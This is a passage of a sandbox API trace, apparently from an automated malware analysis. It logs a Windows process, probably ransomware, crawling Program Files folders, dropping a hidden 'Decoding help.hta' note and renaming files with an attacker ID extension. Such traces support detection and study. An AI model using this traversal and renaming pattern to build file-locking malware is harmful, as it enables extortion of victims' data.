nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0059.095] FindClose (in: hFindFile=0x6716b0 | out: hFindFile=0x6716b0) returned 1 Thread: id = 857 os_tid = 0xadc [0054.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*", lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671270 [0054.670] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.670] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.670] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.670] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.670] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f37b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f37b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CSharp", cAlternateFileName="")) returned 1 [0054.670] lstrcmpW (lpString1=".", lpString2="CSharp") returned -1 [0054.670] lstrcmpW (lpString1="..", lpString2="CSharp") returned -1 [0054.670] lstrcmpiW (lpString1="windows", lpString2="CSharp") returned 1 [0054.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*" [0054.670] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*") returned 87 [0054.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\", lpString2="CSharp" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp" [0054.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*.*" [0054.671] GlobalMemoryStatus (in: lpBuffer=0x289dfd10 | out: lpBuffer=0x289dfd10) [0054.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10db6cf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x74c [0054.680] CloseHandle (hObject=0x74c) returned 1 [0054.680] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisualBasic", cAlternateFileName="VISUAL~1")) returned 1 [0054.680] lstrcmpW (lpString1=".", lpString2="VisualBasic") returned -1 [0054.680] lstrcmpW (lpString1="..", lpString2="VisualBasic") returned -1 [0054.680] lstrcmpiW (lpString1="windows", lpString2="VisualBasic") returned 1 [0054.682] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*" [0054.683] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\*.*") returned 87 [0054.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\", lpString2="VisualBasic" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic" [0054.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\*.*" [0054.683] GlobalMemoryStatus (in: lpBuffer=0x289dfd10 | out: lpBuffer=0x289dfd10) [0054.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8506a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x74c [0054.685] CloseHandle (hObject=0x74c) returned 1 [0054.685] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f5dcf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f5dcf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisualBasic", cAlternateFileName="VISUAL~1")) returned 0 [0054.685] FindClose (in: hFindFile=0x671270 | out: hFindFile=0x671270) returned 1 Thread: id = 858 os_tid = 0x8cc [0054.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*", lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6717f0 [0054.677] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.677] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.677] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.677] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.677] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.html", cAlternateFileName="")) returned 1 [0054.679] lstrcpyW (in: lpString1=0x2a8486a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0054.679] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 71 [0054.679] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" [0054.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0054.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0054.680] WriteFile (in: hFile=0x24c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x28b1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x28b1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.535] CloseHandle (hObject=0x24c) returned 1 [0056.935] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.460] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cpu.html") returned 1 [0058.460] lstrlenW (lpString="cpu.html") returned 8 [0058.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0058.460] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 71 [0058.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="cpu.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" [0058.460] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" [0058.460] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.460] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0058.461] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0058.461] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0058.461] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0058.461] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0058.461] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 71 [0058.461] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css" [0058.461] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*" [0058.461] GlobalMemoryStatus (in: lpBuffer=0x28b1fd10 | out: lpBuffer=0x28b1fd10) [0058.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e40ad8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x48c [0058.462] CloseHandle (hObject=0x48c) returned 1 [0058.462] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0058.462] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0058.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 71 [0058.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" [0058.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.462] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.462] lstrlenW (lpString="gadget.xml") returned 10 [0058.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0058.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 71 [0058.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" [0058.462] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" [0058.462] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.462] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.462] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.462] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.462] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.463] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0058.463] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 71 [0058.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js" [0058.463] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*" [0058.463] GlobalMemoryStatus (in: lpBuffer=0x28b1fd10 | out: lpBuffer=0x28b1fd10) [0058.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113643d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x48c [0058.463] CloseHandle (hObject=0x48c) returned 1 [0058.464] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x28b1fd30 | out: lpFindFileData=0x28b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0058.464] FindClose (in: hFindFile=0x6717f0 | out: hFindFile=0x6717f0) returned 1 Thread: id = 859 os_tid = 0xbe0 [0054.685] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*", lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5fb0 [0056.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.138] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.138] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.138] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x28c5fd30 | out: lpFindFileData=0x28c5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0056.138] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0056.138] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0056.138] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0056.586] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0056.586] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 76 [0056.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows 